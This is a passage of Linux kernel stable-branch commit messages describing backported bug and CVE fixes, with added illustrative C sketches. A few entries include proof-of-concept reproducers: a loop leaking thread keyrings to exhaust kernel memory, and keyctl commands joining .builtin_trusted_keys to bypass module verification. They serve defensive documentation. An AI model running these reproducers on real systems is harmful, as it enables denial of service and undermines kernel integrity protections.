[ 145.154940]  [<ffffffffa2a3e8cf>] ? __might_fault+0x4f/0xa0
[ 145.160511]  [<ffffffffa2a5e237>] zswap_compressor_param_set+0x17/0x20
[ 145.167035]  [<ffffffffa2908d3c>] param_attr_store+0x5c/0xb0
[ 145.172694]  [<ffffffffa290848d>] module_attr_store+0x1d/0x30
[ 145.178443]  [<ffffffffa2b2b41f>] sysfs_kf_write+0x4f/0x70
[ 145.183925]  [<ffffffffa2b2a5b9>] kernfs_fop_write+0x149/0x180
[ 145.189761]  [<ffffffffa2a99248>] __vfs_write+0x18/0x40
[ 145.194982]  [<ffffffffa2a9a412>] vfs_write+0xb2/0x1a0
[ 145.200122]  [<ffffffffa2a9a732>] SyS_write+0x52/0xa0
[ 145.205177]  [<ffffffffa2ff4d97>] entry_SYSCALL_64_fastpath+0x12/0x17
This can be even triggered manually by changing
/sys/module/zswap/parameters/compressor multiple times.
Fix this issue by making unregister APIs symmetric to the register so
there are no surprises.
[js] backport to 3.12
Fixes: 47e627bc8c9a ("[PATCH] hotplug: Allow modules to use the cpu hotplug notifiers even if !CONFIG_HOTPLUG_CPU")
Reported-and-tested-by: Yu Zhao <yuzhao@google.com>
Signed-off-by: Michal Hocko <mhocko@suse.com>
Cc: linux-mm@kvack.org
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: Dan Streetman <ddstreet@ieee.org>
Link: http://lkml.kernel.org/r/20161207135438.4310-1-mhocko@kernel.org
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Boris Brezillon [Fri, 28 Oct 2016 15:12:28 +0000 (17:12 +0200)]
m68k: Fix ndelay() macro
commit 7e251bb21ae08ca2e4fb28cc0981fac2685a8efa upstream.
The current ndelay() macro definition has an extra semi-colon at the
end of the line thus leading to a compilation error when ndelay is used
in a conditional block without curly braces like this one:
if (cond)
ndelay(t);
else
...
which, after the preprocessor pass gives:
if (cond)
m68k_ndelay(t);;
else
...
thus leading to the following gcc error:
error: 'else' without a previous 'if'
Remove this extra semi-colon.
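A standalone demo of the macro pitfall (illustrative only, not the m68k header):

  #include <stdio.h>

  static void do_delay(unsigned long nsec) { (void)nsec; }

  /* #define ndelay(n) do_delay(n);   broken: expands to "do_delay(n);;"  */
  #define ndelay(n) do_delay(n)    /* fixed: the caller supplies the ';' */

  int main(void)
  {
          int cond = 1;

          if (cond)
                  ndelay(100);
          else
                  puts("no delay");
          return 0;
  }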
Signed-off-by: Boris Brezillon <boris.brezillon@free-electrons.com>
Fixes: c8ee038bd1488 ("m68k: Implement ndelay() based on the existing udelay() logic")
Signed-off-by: Geert Uytterhoeven <geert@linux-m68k.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Thomas Gleixner [Wed, 30 Nov 2016 21:04:41 +0000 (21:04 +0000)]
locking/rtmutex: Prevent dequeue vs. unlock race
commit dbb26055defd03d59f678cb5f2c992abe05b064a upstream.
David reported a futex/rtmutex state corruption. It's caused by the
following problem:
CPU0            CPU1            CPU2
 l->owner=T1
                rt_mutex_lock(l)
                lock(l->wait_lock)
                l->owner = T1 | HAS_WAITERS;
                enqueue(T2)
                boost()
                unlock(l->wait_lock)
                schedule()
                                rt_mutex_lock(l)
                                lock(l->wait_lock)
                                l->owner = T1 | HAS_WAITERS;
                                enqueue(T3)
                                boost()
                                unlock(l->wait_lock)
                                schedule()
                signal(->T2)    signal(->T3)
                lock(l->wait_lock)
                dequeue(T2)
                deboost()
                unlock(l->wait_lock)
                                lock(l->wait_lock)
                                dequeue(T3)
                                 ===> wait list is now empty
                                deboost()
                                unlock(l->wait_lock)
                lock(l->wait_lock)
                fixup_rt_mutex_waiters()
                  if (wait_list_empty(l)) {
                    owner = l->owner & ~HAS_WAITERS;
                    l->owner = owner
                     ==> l->owner = T1
                  }
                                lock(l->wait_lock)
rt_mutex_unlock(l)              fixup_rt_mutex_waiters()
                                  if (wait_list_empty(l)) {
                                    owner = l->owner & ~HAS_WAITERS;
cmpxchg(l->owner, T1, NULL)
 ===> Success (l->owner = NULL)
                                    l->owner = owner
                                     ==> l->owner = T1
                                  }
That means the problem is caused by fixup_rt_mutex_waiters() which does the
RMW to clear the waiters bit unconditionally when there are no waiters in
the rtmutexes rbtree.
This can be fatal: A concurrent unlock can release the rtmutex in the
fastpath because the waiters bit is not set. If the cmpxchg() gets in the
middle of the RMW operation then the previous owner, which just unlocked
the rtmutex is set as the owner again when the write takes place after the
successful cmpxchg().
The solution is rather trivial: verify that the owner member of the rtmutex
has the waiters bit set before clearing it. This does not require a
cmpxchg() or other atomic operations because the waiters bit can only be
set and cleared with the rtmutex wait_lock held. It's also safe against the
fast path unlock attempt. The unlock attempt via cmpxchg() will either see
the bit set and take the slowpath or see the bit cleared and release it
atomically in the fastpath.
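A hedged, much-simplified sketch of that guard (not the kernel's fixup_rt_mutex_waiters(); everything here is illustrative):

  #include <stdint.h>

  #define HAS_WAITERS 1UL

  static void fixup_waiters_bit(uintptr_t *owner_field)
  {
          uintptr_t owner = *owner_field;

          if (owner & HAS_WAITERS)                 /* the added check */
                  *owner_field = owner & ~HAS_WAITERS;
  }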
It's remarkable that the test program provided by David triggers on ARM64
and MIPS64 really quick, but it refuses to reproduce on x86-64, while the
problem exists there as well. That refusal might explain why this was not
discovered earlier despite the bug existing from day one of the rtmutex
implementation more than 10 years ago.
Thanks to David for meticulously instrumenting the code and providing the
information which allowed to decode this subtle problem.
Reported-by: David Daney <ddaney@caviumnetworks.com>
Tested-by: David Daney <david.daney@cavium.com>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Reviewed-by: Steven Rostedt <rostedt@goodmis.org>
Acked-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Mark Rutland <mark.rutland@arm.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Sebastian Siewior <bigeasy@linutronix.de>
Cc: Will Deacon <will.deacon@arm.com>
Fixes: 23f78d4a03c5 ("[PATCH] pi-futex: rt mutex core")
Link: http://lkml.kernel.org/r/20161130210030.351136722@linutronix.de
Signed-off-by: Ingo Molnar <mingo@kernel.org>
[wt: s/{READ,WRITE}_ONCE/ACCESS_ONCE/]
Signed-off-by: Willy Tarreau <w@1wt.eu>
Jan Kara [Sun, 24 Apr 2016 04:56:03 +0000 (00:56 -0400)]
ext4: fix data exposure after a crash
commit 06bd3c36a733ac27962fea7d6f47168841376824 upstream.
Huang has reported that in his powerfail testing he is seeing stale
block contents in some of recently allocated blocks although he mounts
ext4 in data=ordered mode. After some investigation I have found out
that indeed when delayed allocation is used, we don't add inode to
transaction's list of inodes needing flushing before commit. Originally
we were doing that but commit f3b59291a69d removed the logic with a
flawed argument that it is not needed.
The problem is that although for delayed allocated blocks we write their
contents immediately after allocating them, there is no guarantee that
the IO scheduler or device doesn't reorder things and thus transaction
allocating blocks and attaching them to inode can reach stable storage
before actual block contents. Actually whenever we attach freshly
allocated blocks to inode using a written extent, we should add inode to
transaction's ordered inode list to make sure we properly wait for block
contents to be written before committing the transaction. So that is
what we do in this patch. This also handles other cases where stale data
exposure was possible - like filling hole via mmap in
data=ordered,nodelalloc mode.
The only exception to the above rule are extending direct IO writes where
blkdev_direct_IO() waits for IO to complete before increasing i_size and
thus stale data exposure is not possible. For now we don't complicate
the code with optimizing this special case since the overhead is pretty
low. In case this is observed to be a performance problem we can always
handle it using a special flag to ext4_map_blocks().
Fixes: f3b59291a69d0b734be1fc8be489fef2dd846d3d
Reported-by: "HUANG Weller (CM/ESW12-CN)" <Weller.Huang@cn.bosch.com>
Tested-by: "HUANG Weller (CM/ESW12-CN)" <Weller.Huang@cn.bosch.com>
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Eric Biggers [Tue, 18 Apr 2017 14:31:09 +0000 (15:31 +0100)]
KEYS: fix keyctl_set_reqkey_keyring() to not leak thread keyrings
commit c9f838d104fed6f2f61d68164712e3204bf5271b upstream.
This fixes CVE-2017-7472.
Running the following program as an unprivileged user exhausts kernel
memory by leaking thread keyrings:
#include <keyutils.h>
int main()
{
        for (;;)
                keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING);
}
Fix it by only creating a new thread keyring if there wasn't one before.
To make things more consistent, make install_thread_keyring_to_cred()
and install_process_keyring_to_cred() both return 0 if the corresponding
keyring is already present.
Fixes: d84f4f992cbd ("CRED: Inaugurate COW credentials")
Signed-off-by: Eric Biggers <ebiggers@google.com>
Signed-off-by: David Howells <dhowells@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
David Howells [Tue, 18 Apr 2017 14:31:08 +0000 (15:31 +0100)]
KEYS: Change the name of the dead type to ".dead" to prevent user access
commit c1644fe041ebaf6519f6809146a77c3ead9193af upstream.
This fixes CVE-2017-6951.
Userspace should not be able to do things with the "dead" key type as it
doesn't have some of the helper functions set upon it that the kernel
needs. Attempting to use it may cause the kernel to crash.
Fix this by changing the name of the type to ".dead" so that it's rejected
up front on userspace syscalls by key_get_type_from_user().
Though this doesn't seem to affect recent kernels, it does affect older
ones, certainly those prior to:
commit c06cfb08b88dfbe13be44a69ae2fdc3a7c902d81
Author: David Howells <dhowells@redhat.com>
Date: Tue Sep 16 17:36:06 2014 +0100
KEYS: Remove key_type::match in favour of overriding default by match_preparse
which went in before 3.18-rc1.
Signed-off-by: David Howells <dhowells@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
David Howells [Tue, 18 Apr 2017 14:31:07 +0000 (15:31 +0100)]
KEYS: Disallow keyrings beginning with '.' to be joined as session keyrings
commit ee8f844e3c5a73b999edf733df1c529d6503ec2f upstream.
This fixes CVE-2016-9604.
Keyrings whose name begin with a '.' are special internal keyrings and so
userspace isn't allowed to create keyrings by this name to prevent
shadowing. However, the patch that added the guard didn't fix
KEYCTL_JOIN_SESSION_KEYRING. Not only can that create dot-named keyrings,
it can also subscribe to them as a session keyring if they grant SEARCH
permission to the user.
This, for example, allows a root process to set .builtin_trusted_keys as
its session keyring, at which point it has full access because now the
possessor permissions are added. This permits root to add extra public
keys, thereby bypassing module verification.
This also affects kexec and IMA.
This can be tested by (as root):
keyctl session .builtin_trusted_keys
keyctl add user a a @s
keyctl list @s
which on my test box gives me:
2 keys in keyring:
180010936: ---lswrv     0     0   asymmetric: Build time autogenerated kernel key: ae3d4a31b82daa8e1a75b49dc2bba949fd992a05
801382539: --alswrv 0 0 user: a
Fix this by rejecting names beginning with a '.' in the keyctl.
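A hedged sketch of the rejection described above (simplified, standalone; the helper name is made up):

  #include <stdbool.h>

  /* dot-named keyrings are kernel-internal; user requests to join or
   * create one by name should be refused */
  static bool keyring_name_allowed(const char *name)
  {
          return !(name && name[0] == '.');
  }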
Signed-off-by: David Howells <dhowells@redhat.com>
Acked-by: Mimi Zohar <zohar@linux.vnet.ibm.com>
cc: linux-ima-devel@lists.sourceforge.net
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Andy Whitcroft [Thu, 23 Mar 2017 07:45:44 +0000 (07:45 +0000)]
xfrm_user: validate XFRM_MSG_NEWAE incoming ESN size harder
commit f843ee6dd019bcece3e74e76ad9df0155655d0df upstream.
Kees Cook has pointed out that xfrm_replay_state_esn_len() is subject to
wrapping issues. To ensure that the two ESN structures really are the
same size, compare both the overall size as reported by
xfrm_replay_state_esn_len() and the internal length.
CVE-2017-7184
Signed-off-by: Andy Whitcroft <apw@canonical.com>
Acked-by: Steffen Klassert <steffen.klassert@secunet.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Andy Whitcroft [Wed, 22 Mar 2017 07:29:31 +0000 (07:29 +0000)]
xfrm_user: validate XFRM_MSG_NEWAE XFRMA_REPLAY_ESN_VAL replay_window
commit 677e806da4d916052585301785d847c3b3e6186a upstream.
When a new xfrm state is created during an XFRM_MSG_NEWSA call we
validate the user supplied replay_esn to ensure that the size is valid
and to ensure that the replay_window size is within the allocated
buffer. However later it is possible to update this replay_esn via a
XFRM_MSG_NEWAE call. There we again validate the size of the supplied
buffer matches the existing state and if so inject the contents. We do
not at this point check that the replay_window is within the allocated
memory. This leads to out-of-bounds reads and writes triggered by
netlink packets. This leads to memory corruption and the potential for
privilege escalation.
We already attempt to validate the incoming replay information in
xfrm_new_ae() via xfrm_replay_verify_len(). This confirms that the user
is not trying to change the size of the replay state buffer which
includes the replay_esn. It however does not check the replay_window
remains within that buffer. Add validation of the contained
replay_window.
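A hedged, simplified sketch of the added bound check (field names made up to mirror the description):

  #include <stdbool.h>

  struct esn_update {
          unsigned int bmp_len;        /* 32-bit words allocated for the bitmap */
          unsigned int replay_window;  /* window size in bits */
  };

  static bool replay_window_ok(const struct esn_update *up)
  {
          /* the window must fit inside the bitmap allocated for this state */
          return up->replay_window <= up->bmp_len * 32u;
  }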
CVE-2017-7184
Signed-off-by: Andy Whitcroft <apw@canonical.com>
Acked-by: Steffen Klassert <steffen.klassert@secunet.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Eric Dumazet [Fri, 3 Feb 2017 22:59:38 +0000 (14:59 -0800)]
tcp: avoid infinite loop in tcp_splice_read()
commit ccf7abb93af09ad0868ae9033d1ca8108bdaec82 upstream.
Splicing from TCP socket is vulnerable when a packet with URG flag is
received and stored into receive queue.
__tcp_splice_read() returns 0, and sk_wait_data() immediately
returns since there is the problematic skb in queue.
This is a nice way to burn cpu (aka infinite loop) and trigger
soft lockups.
Again, this gem was found by syzkaller tool.
Fixes: 9c55e01c0cc8 ("[TCP]: Splice receive support.")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Cc: Willy Tarreau <w@1wt.eu>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Stephen Smalley [Tue, 31 Jan 2017 16:54:04 +0000 (11:54 -0500)]
selinux: fix off-by-one in setprocattr
commit 0c461cb727d146c9ef2d3e86214f498b78b7d125 upstream.
SELinux tries to support setting/clearing of /proc/pid/attr attributes
from the shell by ignoring terminating newlines and treating an
attribute value that begins with a NUL or newline as an attempt to
clear the attribute. However, the test for clearing attributes has
always been wrong; it has an off-by-one error, and this could further
lead to reading past the end of the allocated buffer since commit bb646cdb12e75d82258c2f2e7746d5952d3e321a ("proc_pid_attr_write():
switch to memdup_user()"). Fix the off-by-one error.
Even with this fix, setting and clearing /proc/pid/attr attributes
from the shell is not straightforward since the interface does not
support multiple write() calls (so shells that write the value and
newline separately will set and then immediately clear the attribute,
requiring use of echo -n to set the attribute), whereas trying to use
echo -n "" to clear the attribute causes the shell to skip the
write() call altogether since POSIX says that a zero-length write
causes no side effects. Thus, one must use echo -n to set and echo
without -n to clear, as in the following example:
$ echo -n unconfined_u:object_r:user_home_t:s0 > /proc/$$/attr/fscreate
$ cat /proc/$$/attr/fscreate
unconfined_u:object_r:user_home_t:s0
$ echo "" > /proc/$$/attr/fscreate
$ cat /proc/$$/attr/fscreate
Note the use of /proc/$$ rather than /proc/self, as otherwise
the cat command will read its own attribute value, not that of the shell.
There are no users of this facility to my knowledge; possibly we
should just get rid of it.
UPDATE: Upon further investigation it appears that a local process
with the process:setfscreate permission can cause a kernel panic as a
result of this bug. This patch fixes CVE-2017-2618.
Signed-off-by: Stephen Smalley <sds@tycho.nsa.gov>
[PM: added the update about CVE-2017-2618 to the commit description]
Signed-off-by: Paul Moore <paul@paul-moore.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: James Morris <james.l.morris@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Kees Cook [Tue, 24 Jan 2017 23:18:24 +0000 (15:18 -0800)]
fbdev: color map copying bounds checking
commit 2dc705a9930b4806250fbf5a76e55266e59389f2 upstream.
Copying color maps to userspace doesn't check the value of to->start,
which will cause kernel heap buffer OOB read due to signedness wraps.
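A hedged, simplified sketch of the offset validation implied above (types made up; not the fbcmap.c code): compute the offsets as unsigned values and reject any that fall outside either map.

  #include <stdbool.h>

  struct cmap {
          unsigned int start;
          unsigned int len;
  };

  static bool cmap_offsets_ok(const struct cmap *from, const struct cmap *to)
  {
          unsigned int fromoff = 0, tooff = 0;

          if (to->start > from->start)
                  fromoff = to->start - from->start;
          else
                  tooff = from->start - to->start;

          return fromoff < from->len && tooff < to->len;
  }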
CVE-2016-8405
Link: http://lkml.kernel.org/r/20170105224249.GA50925@beast
Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2")
Signed-off-by: Kees Cook <keescook@chromium.org>
Reported-by: Peter Pi (@heisecode) of Trend Micro
Cc: Min Chong <mchong@google.com>
Cc: Dan Carpenter <dan.carpenter@oracle.com>
Cc: Tomi Valkeinen <tomi.valkeinen@ti.com>
Cc: Bartlomiej Zolnierkiewicz <b.zolnierkie@samsung.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Gu Zheng [Mon, 9 Jan 2017 01:34:48 +0000 (09:34 +0800)]
tmpfs: clear S_ISGID when setting posix ACLs
commit 497de07d89c1410d76a15bec2bb41f24a2a89f31 upstream.
The tmpfs modification was missed in the CVE-2016-7097 fix, commit
073931017b49 ("posix_acl: Clear SGID bit when setting file permissions").
This can be tested with xfstest generic/375, which fails to clear the
setgid bit in the following test case on tmpfs:
touch $testfile
chown 100:100 $testfile
chmod 2755 $testfile
_runas -u 100 -g 101 -- setfacl -m u::rwx,g::rwx,o::rwx $testfile
Signed-off-by: Gu Zheng <guzheng1@huawei.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Jan Kara [Tue, 25 Oct 2016 13:44:26 +0000 (08:44 -0500)]
posix_acl: Clear SGID bit when setting file permissions
commit 073931017b49d9458aa351605b43a7e34598caef upstream.
When file permissions are modified via chmod(2) and the user is not in
the owning group or capable of CAP_FSETID, the setgid bit is cleared in
inode_change_ok(). Setting a POSIX ACL via setxattr(2) sets the file
permissions as well as the new ACL, but doesn't clear the setgid bit in
a similar way; this allows to bypass the check in chmod(2). Fix that.
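A hedged userspace illustration of the rule being enforced (not the kernel helper that implements it): when a mode is derived from a new ACL, drop S_ISGID unless the caller is in the owning group or has CAP_FSETID, mirroring chmod(2).

  #include <stdbool.h>
  #include <sys/stat.h>

  static mode_t acl_derived_mode(mode_t new_mode, bool in_owning_group,
                                 bool has_cap_fsetid)
  {
          if (!in_owning_group && !has_cap_fsetid)
                  new_mode &= ~S_ISGID;
          return new_mode;
  }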
Reviewed-by: Christoph Hellwig <hch@lst.de>
Reviewed-by: Jeff Layton <jlayton@redhat.com>
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Andreas Gruenbacher <agruenba@redhat.com>
[wt: dropped hfsplus changes : no xattr in 3.10]
Signed-off-by: Willy Tarreau <w@1wt.eu>
Steve Rutherford [Thu, 12 Jan 2017 02:28:29 +0000 (18:28 -0800)]
KVM: x86: Introduce segmented_write_std
commit 129a72a0d3c8e139a04512325384fe5ac119e74d upstream.
Introduces segmented_write_std.
Switches from emulated reads/writes to standard read/writes in fxsave,
fxrstor, sgdt, and sidt. This fixes CVE-2017-2584, a longstanding
kernel memory leak.
Since commit 283c95d0e389 ("KVM: x86: emulate FXSAVE and FXRSTOR",
2016-11-09), which is luckily not yet in any final release, this would
also be an exploitable kernel memory *write*!
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Fixes: 96051572c819194c37a8367624b285be10297eca
Fixes: 283c95d0e3891b64087706b344a4b545d04a6e62
Suggested-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: Steve Rutherford <srutherford@google.com>
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Paolo Bonzini [Thu, 12 Jan 2017 14:02:32 +0000 (15:02 +0100)]
KVM: x86: fix emulation of "MOV SS, null selector"
commit 33ab91103b3415e12457e3104f0e4517ce12d0f3 upstream.
This is CVE-2017-2583. On Intel this causes a failed vmentry because
SS's type is neither 3 nor 7 (even though the manual says this check is
only done for usable SS, and the dmesg splat says that SS is unusable!).
On AMD it's worse: svm.c is confused and sets CPL to 0 in the vmcb.
The fix fabricates a data segment descriptor when SS is set to a null
selector, so that CPL and SS.DPL are set correctly in the VMCS/vmcb.
Furthermore, only allow setting SS to a NULL selector if SS.RPL < 3;
this in turn ensures CPL < 3 because RPL must be equal to CPL.
Thanks to Andy Lutomirski and Willy Tarreau for help in analyzing
the bug and deciphering the manuals.
[js] backport to 3.12
Reported-by: Xiaohan Zhang <zhangxiaohan1@huawei.com>
Fixes: 79d5b4c3cd809c770d4bf9812635647016c56011
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Ilya Dryomov [Wed, 1 Mar 2017 16:33:27 +0000 (17:33 +0100)]
libceph: don't set weight to IN when OSD is destroyed
commit b581a5854eee4b7851dedb0f8c2ceb54fb902c06 upstream.
Since ceph.git commit 4e28f9e63644 ("osd/OSDMap: clear osd_info,
osd_xinfo on osd deletion"), weight is set to IN when OSD is deleted.
This changes the result of applying an incremental for clients, not
just OSDs. Because CRUSH computations are obviously affected,
pre-4e28f9e63644 servers disagree with post-4e28f9e63644 clients on
object placement, resulting in misdirected requests.
Mirrors ceph.git commit a6009d1039a55e2c77f431662b3d6cc5a8e8e63f.
Fixes: 930c53286977 ("libceph: apply new_state before new_up_client on incrementals")
Link: http://tracker.ceph.com/issues/19122
Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
Reviewed-by: Sage Weil <sage@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Ryan Ware [Thu, 11 Feb 2016 23:58:44 +0000 (15:58 -0800)]
EVM: Use crypto_memneq() for digest comparisons
commit 613317bd212c585c20796c10afe5daaa95d4b0a1 upstream.
This patch fixes vulnerability CVE-2016-2085. The problem exists
because the evm_verify_hmac() function includes a use of memcmp().
Unfortunately, this allows timing side channel attacks; specifically
a MAC forgery complexity drop from 2^128 to 2^12. This patch changes
the memcmp() to the cryptographically safe crypto_memneq().
Reported-by: Xiaofei Rex Guo <xiaofei.rex.guo@intel.com>
Signed-off-by: Ryan Ware <ware@linux.intel.com>
Cc: stable@vger.kernel.org
Signed-off-by: Mimi Zohar <zohar@linux.vnet.ibm.com>
Signed-off-by: James Morris <james.l.morris@oracle.com>
Cc: Jason A. Donenfeld <Jason@zx2c4.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
James Yonan [Thu, 26 Sep 2013 08:20:39 +0000 (02:20 -0600)]
crypto: crypto_memneq - add equality testing of memory regions w/o timing leaks
commit 6bf37e5aa90f18baf5acf4874bca505dd667c37f upstream.
When comparing MAC hashes, AEAD authentication tags, or other hash
values in the context of authentication or integrity checking, it
is important not to leak timing information to a potential attacker,
i.e. when communication happens over a network.
Bytewise memory comparisons (such as memcmp) are usually optimized so
that they return a nonzero value as soon as a mismatch is found. E.g,
on x86_64/i5 for 512 bytes this can be ~50 cyc for a full mismatch
and up to ~850 cyc for a full match (cold). This early-return behavior
can leak timing information as a side channel, allowing an attacker to
iteratively guess the correct result.
This patch adds a new method crypto_memneq ("memory not equal to each
other") to the crypto API that compares memory areas of the same length
in roughly "constant time" (cache misses could change the timing, but
since they don't reveal information about the content of the strings
being compared, they are effectively benign). Iow, best and worst case
behaviour take the same amount of time to complete (in contrast to
memcmp).
Note that crypto_memneq (unlike memcmp) can only be used to test for
equality or inequality, NOT for lexicographical order. This, however,
is not an issue for its use-cases within the crypto API.
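A hedged, generic illustration of a constant-time inequality test in the spirit described (this is not the kernel's crypto_memneq implementation): differences are OR-accumulated so the loop never exits early.

  #include <stddef.h>

  static unsigned long ct_memneq(const void *a, const void *b, size_t len)
  {
          const unsigned char *pa = a, *pb = b;
          unsigned long neq = 0;

          while (len--)
                  neq |= *pa++ ^ *pb++;   /* no early return on mismatch */
          return neq;                     /* zero iff the regions are equal */
  }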
We tried to locate all of the places in the crypto API where memcmp was
being used for authentication or integrity checking, and convert them
over to crypto_memneq.
crypto_memneq is declared noinline, placed in its own source file,
and compiled with optimizations that might increase code size disabled
("Os") because a smart compiler (or LTO) might notice that the return
value is always compared against zero/nonzero, and might then
reintroduce the same early-return optimization that we are trying to
avoid.
Using #pragma or __attribute__ optimization annotations of the code
for disabling optimization was avoided as it seems to be considered
broken or unmaintained for long time in GCC [1]. Therefore, we work
around that by specifying the compile flag for memneq.o directly in
the Makefile. We found that this seems to be most appropriate.
As we use ("Os"), this patch also provides a loop-free "fast-path" for
frequently used 16 byte digests. Similarly to kernel library string
functions, leave an option for future even further optimized architecture
specific assembler implementations.
This was a joint work of James Yonan and Daniel Borkmann. Also thanks
for feedback from Florian Weimer on this and earlier proposals [2].
[1] http://gcc.gnu.org/ml/gcc/2012-07/msg00211.html
[2] https://lkml.org/lkml/2013/2/10/131
Signed-off-by: James Yonan <james@openvpn.net>
Signed-off-by: Daniel Borkmann <dborkman@redhat.com>
Cc: Florian Weimer <fw@deneb.enyo.de>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Cc: Jason A. Donenfeld <Jason@zx2c4.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Philip Pettersson [Wed, 30 Nov 2016 22:55:36 +0000 (14:55 -0800)]
packet: fix race condition in packet_set_ring
commit 84ac7260236a49c79eede91617700174c2c19b0c upstream.
When packet_set_ring creates a ring buffer it will initialize a
struct timer_list if the packet version is TPACKET_V3. This value
can then be raced by a different thread calling setsockopt to
set the version to TPACKET_V1 before packet_set_ring has finished.
This leads to a use-after-free on a function pointer in the
struct timer_list when the socket is closed as the previously
initialized timer will not be deleted.
The bug is fixed by taking lock_sock(sk) in packet_setsockopt when
changing the packet version while also taking the lock at the start
of packet_set_ring.
Fixes: f6fb8f100b80 ("af-packet: TPACKET_V3 flexible buffer implementation.")
Signed-off-by: Philip Pettersson <philip.pettersson@gmail.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Cc: gregkh@linuxfoundation.org
Signed-off-by: Willy Tarreau <w@1wt.eu>
Willy Tarreau [Fri, 10 Feb 2017 10:14:46 +0000 (11:14 +0100)]
Linux 3.10.105
Guenter Roeck [Fri, 7 Oct 2016 17:40:59 +0000 (10:40 -0700)]
metag: Only define atomic_dec_if_positive conditionally
commit 35d04077ad96ed33ceea2501f5a4f1eacda77218 upstream.
The definition of atomic_dec_if_positive() assumes that
atomic_sub_if_positive() exists, which is only the case if
metag specific atomics are used. This results in the following
build error when trying to build metag1_defconfig.
kernel/ucount.c: In function 'dec_ucount':
kernel/ucount.c:211: error: implicit declaration of function 'atomic_sub_if_positive'
Moving the definition of atomic_dec_if_positive() into the metag
conditional code fixes the problem.
Fixes: 6006c0d8ce94 ("metag: Atomics, locks and bitops")
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Max Staudt [Mon, 13 Jun 2016 17:15:59 +0000 (19:15 +0200)]
fbdev/efifb: Fix 16 color palette entry calculation
commit d50b3f43db739f03fcf8c0a00664b3d2fed0496e upstream.
When using efifb with a 16-bit (5:6:5) visual, fbcon's text is rendered
in the wrong colors - e.g. text gray (#aaaaaa) is rendered as green
(#50bc50) and neighboring pixels have slightly different values
(such as #50bc78).
The reason is that fbcon loads its 16 color palette through
efifb_setcolreg(), which in turn calculates a 32-bit value to write
into memory for each palette index.
Until now, this code could only handle 8-bit visuals and didn't mask
overlapping values when ORing them.
With this patch, fbcon displays the correct colors when a qemu VM is
booted in 16-bit mode (in GRUB: "set gfxpayload=800x600x16").
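As a hedged illustration of the 5:6:5 packing involved (a generic helper, not the efifb_setcolreg() code): each component is masked to its field width before being shifted and ORed, so neighbouring fields cannot bleed into each other.

  #include <stdint.h>

  static uint32_t pack_rgb565(uint32_t red, uint32_t green, uint32_t blue)
  {
          return ((red   & 0x1f) << 11) |
                 ((green & 0x3f) <<  5) |
                  (blue  & 0x1f);
  }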
Fixes: 7c83172b98e5 ("x86_64 EFI boot support: EFI frame buffer driver") # v2.6.24+
Signed-off-by: Max Staudt <mstaudt@suse.de>
Acked-By: Peter Jones <pjones@redhat.com>
Signed-off-by: Tomi Valkeinen <tomi.valkeinen@ti.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Bart Van Assche [Wed, 31 Aug 2016 22:17:49 +0000 (15:17 -0700)]
dm: mark request_queue dead before destroying the DM device
commit 3b785fbcf81c3533772c52b717f77293099498d3 upstream.
This prevents new requests from being queued while __dm_destroy() is in
progress.
[js] use md->queue instead of non-present helper
Signed-off-by: Bart Van Assche <bart.vanassche@sandisk.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Jan Remmet [Fri, 23 Sep 2016 08:52:00 +0000 (10:52 +0200)]
regulator: tps65910: Work around silicon erratum SWCZ010
commit 8f9165c981fed187bb483de84caf9adf835aefda upstream.
http://www.ti.com/lit/pdf/SWCZ010:
DCDC o/p voltage can go higher than programmed value
Impact:
